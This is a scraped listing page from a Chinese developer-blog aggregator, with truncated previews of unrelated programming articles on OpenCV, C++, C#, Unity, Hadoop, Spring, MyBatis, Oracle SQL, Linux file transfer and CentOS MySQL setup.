操作系统：ubuntu22.04OpenCV版本：OpenCV4.9IDE:VisualStudioCode编程语言：C++11算法描述函数用于对图像进行上采样操作（升采样），是GPU加速版本的高斯金字塔向上采样（GaussianPyramidUpsample）。它首先将图像放大为原来的两倍尺寸，并在新插入的像素位置插入零，然后应用一个5x5的高斯核进行平滑处理，从而得到更自然的放大效果。函数原型
c++ 实现小游戏夺宝奇兵 xuanwojiuxin 算法总结
#ifndef_GAME_H_#define_GAME_H_#include#include#include#include#include#include#defineN10#defineM5enume_result{error=-1,ok};classBug//怪物类{public:Bug();voidupdateBugPosition();//更新怪物的位置protected:intposi
使用C# 快速删除Excel表格中的重复行数据-详解 nuclear2011 .NET Excel c#excel 删除Excel重复行删除Excel重复数据 Excel重复行查找并删除
目录简介使用工具C#删除Excel工作表中的重复行C#删除指定Excel单元格区域中的重复行C#基于特定列删除重复行RemoveDuplicates方法快速比较简介重复行是指在Excel表格中完全相同的多行数据。这些冗余行的存在可能源于多种原因，例如：数据输入错误：用户在手动输入数据时，可能不小心多次输入相同的信息。数据导入：从其他系统或文件导入数据时，可能会出现重复记录，尤其是在合并多个数据源时
Unity3D 逻辑代码性能优化策略 Thomas_YXQ 性能优化 spring java Unity3D 游戏引擎 unity
前言在Unity3D中优化逻辑代码性能是提升游戏流畅度的关键。以下是系统性的优化策略和示例：对惹，这里有一个游戏开发交流小组，希望大家可以点击进来一起交流一下开发经验呀！1.避免高频操作中的开销缓存组件引用privateRigidbody_rb;voidStart(){_rb=GetComponent();//避免每帧调用GetComponent}voidUpdate(){_rb.AddForce
Hadoop(一) 朱辉辉33 hadoop linux
今天在诺基亚第一天开始培训大数据，因为之前没接触过Linux，所以这次一起学了，任务量还是蛮大的。首先下载安装了Xshell软件，然后公司给了账号密码连接上了河南郑州那边的服务器，接下来开始按照给的资料学习，全英文的，头也不讲解，说锻炼我们的学习能力，然后就开始跌跌撞撞的自学。这里写部分已经运行成功的代码吧. 在hdfs下，运行hadoop fs -mkdir /u
maven An error occurred while filtering resources blackproof maven 报错
转：http://stackoverflow.com/questions/18145774/eclipse-an-error-occurred-while-filtering-resources maven报错： maven An error occurred while filtering resources Maven -> Update Proje
jdk常用故障排查命令 daysinsun jvm
linux下常见定位命令： 1、jps 输出Java进程 -q 只输出进程ID的名称，省略主类的名称； -m 输出进程启动时传递给main函数的参数； &nb
java 位移运算与乘法运算周凡杨 java 位移运算乘法
对于 JAVA 编程中，适当的采用位移运算，会减少代码的运行时间，提高项目的运行效率。这个可以从一道面试题说起：问题：用最有效率的方法算出2 乘以8 等於几?” 答案：2 << 3 由此就引发了我的思考，为什么位移运算会比乘法运算更快呢？其实简单的想想，计算机的内存是用由 0 和 1 组成的二
java中的枚举(enmu) g21121 java
从jdk1.5开始，java增加了enum(枚举)这个类型，但是大家在平时运用中还是比较少用到枚举的，而且很多人和我一样对枚举一知半解，下面就跟大家一起学习下enmu枚举。先看一个最简单的枚举类型，一个返回类型的枚举： public enum ResultType { /** * 成功 */ SUCCESS, /** * 失败 */ FAIL,
MQ初级学习 510888780 activemq
1.下载ActiveMQ 去官方网站下载：http://activemq.apache.org/ 2.运行ActiveMQ 解压缩apache-activemq-5.9.0-bin.zip到C盘，然后双击apache-activemq-5.9.0-\bin\activemq-admin.bat运行ActiveMQ程序。启动ActiveMQ以后，登陆：http://localhos
Spring_Transactional_Propagation 布衣凌宇 spring transactional
//事务传播属性 @Transactional(propagation=Propagation.REQUIRED)//如果有事务，那么加入事务，没有的话新创建一个 @Transactional(propagation=Propagation.NOT_SUPPORTED)//这个方法不开启事务 @Transactional(propagation=Propagation.REQUIREDS_N
我的spring学习笔记12-idref与ref的区别 aijuans spring
idref用来将容器内其他bean的id传给<constructor-arg>/<property>元素，同时提供错误验证功能。例如： <bean id ="theTargetBean" class="..." /> <bean id ="theClientBean" class=&quo
Jqplot之折线图 antlove js jquery Web timeseries jqplot
timeseriesChart.html <script type="text/javascript" src="jslib/jquery.min.js"></script> <script type="text/javascript" src="jslib/excanvas.min.js&
JDBC中事务处理应用百合不是茶 java JDBC编程事务控制语句
解释事务的概念; 事务控制是sql语句中的核心之一;事务控制的作用就是保证数据的正常执行与异常之后可以恢复事务常用命令: Commit提交
[转]ConcurrentHashMap Collections.synchronizedMap和Hashtable讨论 bijian1013 java 多线程线程安全 HashMap
在Java类库中出现的第一个关联的集合类是Hashtable，它是JDK1.0的一部分。 Hashtable提供了一种易于使用的、线程安全的、关联的map功能，这当然也是方便的。然而，线程安全性是凭代价换来的――Hashtable的所有方法都是同步的。此时，无竞争的同步会导致可观的性能代价。Hashtable的后继者HashMap是作为JDK1.2中的集合框架的一部分出现的，它通过提供一个不同步的
ng-if与ng-show、ng-hide指令的区别和注意事项 bijian1013 JavaScript AngularJS
angularJS中的ng-show、ng-hide、ng-if指令都可以用来控制dom元素的显示或隐藏。ng-show和ng-hide根据所给表达式的值来显示或隐藏HTML元素。当赋值给ng-show指令的值为false时元素会被隐藏，值为true时元素会显示。ng-hide功能类似，使用方式相反。元素的显示或
【持久化框架MyBatis3七】MyBatis3定义typeHandler bit1129 TypeHandler
什么是typeHandler? typeHandler用于将某个类型的数据映射到表的某一列上，以完成MyBatis列跟某个属性的映射内置typeHandler MyBatis内置了很多typeHandler，这写typeHandler通过org.apache.ibatis.type.TypeHandlerRegistry进行注册，比如对于日期型数据的typeHandler，
上传下载文件rz,sz命令 bitcarter linux命令rz
刚开始使用rz上传和sz下载命令：因为我们是通过secureCRT终端工具进行使用的所以会有上传下载这样的需求：我遇到的问题： sz下载A文件10M左右，没有问题但是将这个文件A再传到另一天服务器上时就出现传不上去，甚至出现乱码，死掉现象，具体问题解决方法：上传命令改为;rz -ybe 下载命令改为：sz -be filename 如果还是有问题：那就是文
通过ngx-lua来统计nginx上的虚拟主机性能数据 ronin47 ngx-lua　统计解禁ip
介绍以前我们为nginx做统计,都是通过对日志的分析来完成.比较麻烦,现在基于ngx_lua插件,开发了实时统计站点状态的脚本,解放生产力.项目主页: https://github.com/skyeydemon/ngx-lua-stats 功能支持分不同虚拟主机统计, 同一个虚拟主机下可以分不同的location统计. 可以统计与query-times request-time
java-68-把数组排成最小的数。一个正整数数组，将它们连接起来排成一个数，输出能排出的所有数字中最小的。例如输入数组{32, 321}，则输出32132 bylijinnan java
import java.util.Arrays; import java.util.Comparator; public class MinNumFromIntArray { /** * Q68输入一个正整数数组，将它们连接起来排成一个数，输出能排出的所有数字中最小的一个。 * 例如输入数组{32, 321}，则输出这两个能排成的最小数字32132。请给出解决问题
Oracle基本操作 ccii Oracle SQL总结 Oracle SQL语法 Oracle基本操作 Oracle SQL
一、表操作 1. 常用数据类型 NUMBER(p,s)：可变长度的数字。p表示整数加小数的最大位数，s为最大小数位数。支持最大精度为38位 NVARCHAR2(size)：变长字符串，最大长度为4000字节（以字符数为单位） VARCHAR2(size)：变长字符串，最大长度为4000字节（以字节数为单位） CHAR(size)：定长字符串，最大长度为2000字节，最小为1字节，默认
[强人工智能]实现强人工智能的路线图 comsci 人工智能
1：创建一个用于记录拓扑网络连接的矩阵数据表 2:自动构造或者人工复制一个包含10万个连接(1000*1000)的流程图 3：将这个流程图导入到矩阵数据表中 4：在矩阵的每个有意义的节点中嵌入一段简单的
给Tomcat，Apache配置gzip压缩(HTTP压缩)功能 cwqcwqmax9 apache
背景： HTTP 压缩可以大大提高浏览网站的速度，它的原理是，在客户端请求网页后，从服务器端将网页文件压缩，再下载到客户端，由客户端的浏览器负责解压缩并浏览。相对于普通的浏览过程HTML ,CSS,Javascript , Text ，它可以节省40%左右的流量。更为重要的是，它可以对动态生成的，包括CGI、PHP , JSP , ASP , Servlet,SHTML等输出的网页也能进行压缩，
SpringMVC and Struts2 dashuaifu struts2 springMVC
SpringMVC VS Struts2 1: spring3开发效率高于struts 2: spring3 mvc可以认为已经100%零配置 3: struts2是类级别的拦截，一个类对应一个request上下文， springmvc是方法级别的拦截，一个方法对应一个request上下文，而方法同时又跟一个url对应所以说从架构本身上 spring3 mvc就容易实现r
windows常用命令行命令 dcj3sjt126com windows cmd command
在windows系统中，点击开始－运行，可以直接输入命令行，快速打开一些原本需要多次点击图标才能打开的界面，如常用的输入cmd打开dos命令行，输入taskmgr打开任务管理器。此处列出了网上搜集到的一些常用命令。winver 检查windows版本 wmimgmt.msc 打开windows管理体系结构(wmi) wupdmgr windows更新程序 wscrip
再看知名应用背后的第三方开源项目 dcj3sjt126com ios
知名应用程序的设计和技术一直都是开发者需要学习的，同样这些应用所使用的开源框架也是不可忽视的一部分。此前《 iOS第三方开源库的吐槽和备忘》中作者ibireme列举了国内多款知名应用所使用的开源框架，并对其中一些框架进行了分析，同样国外开发者 @iOSCowboy也在博客中给我们列出了国外多款知名应用使用的开源框架。另外txx's blog中详细介绍了 Facebook Paper使用的第三
Objective-c单例模式的正确写法 jsntghf 单例 ios iPhone
一般情况下，可能我们写的单例模式是这样的： #import <Foundation/Foundation.h> @interface Downloader : NSObject + (instancetype)sharedDownloader; @end #import "Downloader.h" @implementation
jquery easyui datagrid 加载成功，选中某一行 hae jquery easyui datagrid 数据加载
1.首先你需要设置datagrid的onLoadSuccess $( '#dg' ).datagrid({onLoadSuccess : function (data){ $( '#dg' ).datagrid( 'selectRow' ,3); }}); 2.onL
jQuery用户数字打分评价效果 ini JavaScript html jquery Web css
效果体验：http://hovertree.com/texiao/jquery/5.htmHTML文件代码： <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery用户数字打分评分代码 - HoverTree</
mybatis的paramType kerryg DAO sql
MyBatis传多个参数： 1、采用#{0},#{1}获得参数： Dao层函数方法： public User selectUser(String name,String area); 对应的Mapper.xml <select id="selectUser" result
centos 7安装mysql5.5 MrLee23 centos
首先centos7 已经不支持mysql，因为收费了你懂得，所以内部集成了mariadb，而安装mysql的话会和mariadb的文件冲突，所以需要先卸载掉mariadb，以下为卸载mariadb，安装mysql的步骤。 #列出所有被安装的rpm package rpm -qa | grep mariadb #卸载 rpm -e mariadb-libs-5.
利用thrift来实现消息群发 qifeifei thrift
Thrift项目一般用来做内部项目接偶用的，还有能跨不同语言的功能，非常方便，一般前端系统和后台server线上都是3个节点，然后前端通过获取client来访问后台server，那么如果是多太server，就是有一个负载均衡的方法，然后最后访问其中一个节点。那么换个思路，能不能发送给所有节点的server呢，如果能就
实现一个sizeof获取Java对象大小 teasp java HotSpot 内存对象大小 sizeof
由于Java的设计者不想让程序员管理和了解内存的使用，我们想要知道一个对象在内存中的大小变得比较困难了。本文提供了可以获取对象的大小的方法，但是由于各个虚拟机在内存使用上可能存在不同，因此该方法不能在各虚拟机上都适用，而是仅在hotspot 32位虚拟机上，或者其它内存管理方式与hotspot 32位虚拟机相同的虚拟机上适用。
SVN错误及处理 xiangqian0505 SVN提交文件时服务器强行关闭
在SVN服务控制台打开资源库“SVN无法读取current” ---摘自网络写道 SVN无法读取current修复方法 Can't read file : End of file found 文件：repository/db/txn_current、repository/db/current 其中current记录当前最新版本号，txn_current记录版本库中版本

基于Dedup的数据打包技术

你可能感兴趣的:(dup)